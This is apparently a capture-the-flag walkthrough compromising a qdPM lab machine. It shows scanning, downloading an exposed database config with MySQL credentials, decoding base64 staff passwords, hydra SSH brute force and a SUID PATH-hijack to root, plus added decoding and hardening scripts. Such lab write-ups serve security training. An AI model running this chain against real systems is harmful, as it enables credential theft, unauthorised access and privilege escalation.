nmap -sP 10.80.56.0/24
Attacker host: 10.80.56.101
Target: 10.80.56.144
nmap -sS -sV -A -n 10.80.56.144
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
| 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
|_ 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
3306/tcp open mysql MySQL 8.0.26
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Not valid before: 2021-09-25T10:47:29
|_Not valid after: 2031-09-23T10:47:29
| mysql-info:
| Protocol: 10
| Version: 8.0.26
| Thread ID: 11
| Capabilities flags: 65535
| Some Capabilities: FoundRows, Support41Auth, SupportsCompression, ConnectWithDatabase, Speaks41ProtocolOld, SupportsTransactions, ODBCClient, IgnoreSigpipes, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, LongPassword, InteractiveClient, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, SwitchToSSLAfterHandshake, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: \x1CQ1\x04a G7\x1D\x11(\x0B\x18y0:\x12a;I
|_ Auth Plugin Name: caching_sha2_password
# Browse the web page; the visible information is not useful
http://10.80.56.144
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
Password: .2uqPEfj3D<P'a-3
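The Brainfuck program above decodes to the password shown. As an added example (not part of the original writeup), a small interpreter that executes it; the program text is copied from the page, the interpreter and the `decode_page_secret` helper are added here.

```python
# Added example: minimal Brainfuck interpreter used to decode the program
# embedded in the target's web page. BF_PROGRAM is copied from the page.
BF_PROGRAM = "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++."


def run_brainfuck(program: str, tape_size: int = 30000) -> str:
    """Execute a Brainfuck program with no input and return its output."""
    # Pre-compute matching brackets so each jump is O(1) and unbalanced
    # programs are rejected before execution.
    jump = {}
    stack = []
    for i, ch in enumerate(program):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jump[i] = j
            jump[j] = i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")

    tape = [0] * tape_size
    ptr = 0
    pc = 0
    out = []
    while pc < len(program):
        ch = program[pc]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) % 256   # 8-bit cells wrap
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif ch == ".":
            out.append(chr(tape[ptr]))
        elif ch == ",":
            tape[ptr] = 0                       # no input: treat as EOF = 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]
        if not 0 <= ptr < tape_size:
            raise IndexError("tape pointer out of range")
        pc += 1
    return "".join(out)


def decode_page_secret() -> str:
    """Run the program found on the page and return what it prints."""
    return run_brainfuck(BF_PROGRAM)


if __name__ == "__main__":
    print(decode_page_secret())
```

The loop at the start of the program sets four cells to 10, 30, 70 and 100; every later `+`/`-` run only nudges one of those cells to the next character's ASCII value before printing it, which is why the output is a printable string and not arbitrary bytes.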
# Scan the website directories
dirsearch -u http://10.80.56.144
/backups # backup file directory
/check.php
/index.php # qdPM login page; login validation is a POST to http://10.80.56.144/index.php/login
/install/index.php?upgrade/
/install # database configuration page
/manual/index.html # manual page
/readme.txt # information
/robots.txt # crawler policy file, no useful information
/template
/uploads/ # upload directory
qdPM
open source project management software written in symfony framework
http://qdpm.net
INSTALLATION
qdPM is web-based application and it means you have to have web-server.
Simply go to your qdPM web directory and use installer
SUPPORT
Contact me (support@qdpm.net) if you have any questions, suggestions or feedback about qdPM.
My name is Sergey. I always reply to emails within 24-48 hours.
Thanks for downloading and using qdPM open-source solution!
# qdPM is the login framework; use searchsploit to check for known vulnerabilities
searchsploit qdpm 9.2
# From the result: fetch and download the yml file
The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
http://10.80.56.144/core/config/databases.yml
# Obtain the MySQL username and password
all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qdpm;host=localhost'
      profiler: false
      username: qdpmadmin
      password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
      attributes:
        quote_identifier: true
# Log in to MySQL
mysql -uqdpmadmin -h 10.80.56.144 -pUcVQCMQk2STVeS6J
show databases;
use qdpm;
use staff;
# No email addresses, so these are not website login users; "staff" means members, likely local system users
+------+---------------+--------+---------------------------+
| id | department_id | name | role |
+------+---------------+--------+---------------------------+
| 1 | 1 | Smith | Cyber Security Specialist |
| 2 | 2 | Lucas | Computer Engineer |
| 3 | 1 | Travis | Intelligence Specialist |
| 4 | 1 | Dexter | Cyber Security Analyst |
| 5 | 2 | Meyer | Genetic Engineer |
+------+---------------+--------+---------------------------+
+------+---------+--------------------------+
| id | user_id | password |
+------+---------+--------------------------+
| 1 | 2 | c3VSSkFkR3dMcDhkeTNyRg== |
| 2 | 4 | N1p3VjRxdGc0MmNtVVhHWA== |
| 3 | 1 | WDdNUWtQM1cyOWZld0hkQw== |
| 4 | 3 | REpjZVZ5OThXMjhZN3dMZw== |
| 5 | 5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+
+------+----------+
| id | name |
+------+----------+
| 1 | Agent |
| 2 | Engineer |
+------+----------+
# Username wordlist
Smith
Lucas
Travis
Dexter
Meyer
# Password wordlist
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
DJceVy98W28Y7wLg
cqNnBWCByS2DuJSy
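The `password` column holds base64, not a hash: every value decodes straight back to its plaintext, which is what the wordlist above relies on. As an added example (mine, not from the writeup), a parser for the MySQL client's box-drawn table output that decodes each value, joins it to the user name through `user_id`, and applies the check an auditor would use to tell reversible base64 apart from a real password hash. The table text below is a constructed copy of what the page shows.

```python
import base64
import binascii
from typing import Dict, List, Optional

# Constructed copies of the tables as the MySQL client printed them on the page.
USER_TABLE = """\
+------+---------------+--------+---------------------------+
| id   | department_id | name   | role                      |
+------+---------------+--------+---------------------------+
| 1    | 1             | Smith  | Cyber Security Specialist |
| 2    | 2             | Lucas  | Computer Engineer         |
| 3    | 1             | Travis | Intelligence Specialist   |
| 4    | 1             | Dexter | Cyber Security Analyst    |
| 5    | 2             | Meyer  | Genetic Engineer          |
+------+---------------+--------+---------------------------+
"""

LOGIN_TABLE = """\
+------+---------+--------------------------+
| id   | user_id | password                 |
+------+---------+--------------------------+
| 1    | 2       | c3VSSkFkR3dMcDhkeTNyRg== |
| 2    | 4       | N1p3VjRxdGc0MmNtVVhHWA== |
| 3    | 1       | WDdNUWtQM1cyOWZld0hkQw== |
| 4    | 3       | REpjZVZ5OThXMjhZN3dMZw== |
| 5    | 5       | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+
"""


def parse_mysql_table(text: str) -> List[Dict[str, str]]:
    """Turn the client's ASCII box output into a list of row dicts.
    The first '|' line is the header; '+---+' border lines carry no data."""
    header: Optional[List[str]] = None
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line[1:-1].split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def reversible_base64(value: str) -> Optional[str]:
    """Return the plaintext if `value` is canonical base64 of printable ASCII,
    otherwise None. A genuine hash ($2y$..., $6$...) fails this test; a value
    that passes was never hashed at all, so the table is effectively plaintext."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    if base64.b64encode(raw).decode("ascii") != value:
        return None  # decodes, but not canonical: treat as something else
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def recover_credentials(user_table: str, login_table: str) -> Dict[str, str]:
    """Join login rows to user names via user_id and decode each password.
    Returns {lowercase name: plaintext} for every reversible entry."""
    names = {u["id"]: u["name"].lower() for u in parse_mysql_table(user_table)}
    creds: Dict[str, str] = {}
    for row in parse_mysql_table(login_table):
        plain = reversible_base64(row["password"])
        if plain is not None and row["user_id"] in names:
            creds[names[row["user_id"]]] = plain
    return creds


if __name__ == "__main__":
    for name, pw in recover_credentials(USER_TABLE, LOGIN_TABLE).items():
        print(f"{name}:{pw}")
```

The join shows the two pairs hydra later confirms (travis and dexter); more importantly, `reversible_base64` is the kind of check to run over any credential table during a review: if it returns a printable string for every row, the application is storing passwords in the clear, whatever the column is called.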
# Brute-force the target's users with hydra; two results
hydra -L user.txt -P pass.txt ssh://10.80.56.144
[22][ssh] host: 10.80.56.144 login: travis password: DJceVy98W28Y7wLg
[22][ssh] host: 10.80.56.144 login: dexter password: 7ZwV4qtg42cmUXGX
# Log in as travis to get the first flag
ssh travis@10.80.56.144
ICA{Secret_Project}
# Log in as dexter to get the hint
ssh dexter@10.80.56.144
# There may be an executable file whose contents are viewable, which could give a way into the system
It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not.
# Search for SUID (4000) files owned by root
find / -user root -perm -4000 -print 2>/dev/null
/opt/get_access # matches the hint
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
# Since its contents are viewable, dump them with strings
strings /opt/get_access
# It runs cat once
cat /root/system.info
# Forge a cat file and prepend its directory to PATH
echo "/bin/bash" > /tmp/cat;export PATH=/tmp:$PATH;chmod +x /tmp/cat
# Run it; privilege escalation succeeds
/opt/get_access
id
uid=0(root) gid=0(root) groups=0(root),1001(dexter)
# Remove the forged cat file
rm /tmp/cat
# Get the root flag; machine complete
cat root.txt
ICA{Next_Generation_Self_Renewable_Genetics}
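The escalation works because the SUID binary names `cat` without a path and lets the caller's PATH decide which file actually runs. As an added example (mine, not the target's code), a simulation of the shell's lookup in a throwaway directory tree, the check a code reviewer would apply to a `system()` string, and a hardened launcher that uses an absolute path and a fixed environment. It assumes `get_access` spawns a shell with `cat /root/system.info`; the page shows only the `strings` output, not the binary's source.

```python
import os
import stat
import subprocess
import tempfile
from typing import Dict, List, Optional

# Fixed search path a privileged helper should use instead of inheriting PATH.
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def _executable(path: str) -> bool:
    try:
        st = os.stat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & 0o111)


def resolve_command(cmd: str, path: str) -> Optional[str]:
    """Resolve `cmd` the way a POSIX shell does with PATH set to `path`.
    A name containing '/' is used as-is; a bare name is searched directory by
    directory and the first executable match wins (an empty entry means cwd)."""
    if "/" in cmd:
        return cmd if _executable(cmd) else None
    for directory in path.split(os.pathsep):
        candidate = os.path.join(directory or ".", cmd)
        if _executable(candidate):
            return candidate
    return None


def uses_path_lookup(command_line: str) -> bool:
    """True if the program token of a system()-style command line has no '/',
    i.e. the shell would consult PATH. This is the pattern to flag when
    reviewing any setuid program."""
    tokens = command_line.strip().split()
    return bool(tokens) and "/" not in tokens[0]


def hardened_env() -> Dict[str, str]:
    """Minimal environment for a privileged child: fixed PATH, nothing inherited."""
    return {"PATH": SAFE_PATH, "LANG": "C"}


def run_hardened(argv: List[str]) -> "subprocess.CompletedProcess[str]":
    """Launch a child the safe way: absolute program path, no shell, clean env."""
    if not argv or not os.path.isabs(argv[0]):
        raise ValueError("privileged helper must exec an absolute path")
    return subprocess.run(argv, env=hardened_env(), capture_output=True,
                          text=True, check=False)


def _make_script(path: str, body: str) -> str:
    with open(path, "w") as f:
        f.write("#!/bin/sh\n" + body + "\n")
    os.chmod(path, 0o755)
    return path


def demo_hijack() -> Dict[str, bool]:
    """Recreate the writeup's condition in a scratch tree: a writable dir
    (stand-in for /tmp) placed ahead of the system dir (stand-in for /bin),
    each holding a file named `cat`."""
    with tempfile.TemporaryDirectory() as root:
        writable = os.path.join(root, "tmp")
        system_bin = os.path.join(root, "bin")
        os.makedirs(writable)
        os.makedirs(system_bin)
        real = _make_script(os.path.join(system_bin, "cat"), "echo real")
        fake = _make_script(os.path.join(writable, "cat"), "echo hijacked")
        attacker_path = writable + os.pathsep + system_bin
        return {
            # bare name + caller-controlled PATH: the forged file wins
            "bare_name_hijacked": resolve_command("cat", attacker_path) == fake,
            # absolute path: PATH plays no part
            "absolute_path_safe": resolve_command(real, attacker_path) == real,
            # bare name but a fixed PATH (what hardened_env provides): real file
            "fixed_path_safe": resolve_command("cat", system_bin) == real,
        }


if __name__ == "__main__":
    print(demo_hijack())
    print(uses_path_lookup("cat /root/system.info"))
    print(uses_path_lookup("/bin/cat /root/system.info"))
```

Either mitigation on its own closes the hole shown on the page: an absolute program path removes the lookup, and a reset PATH removes the attacker's influence over it. The better fix for a helper that only needs to read one file is to open that file directly and never spawn a child at all, which also takes `LD_PRELOAD`-style environment tricks off the table.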
11-02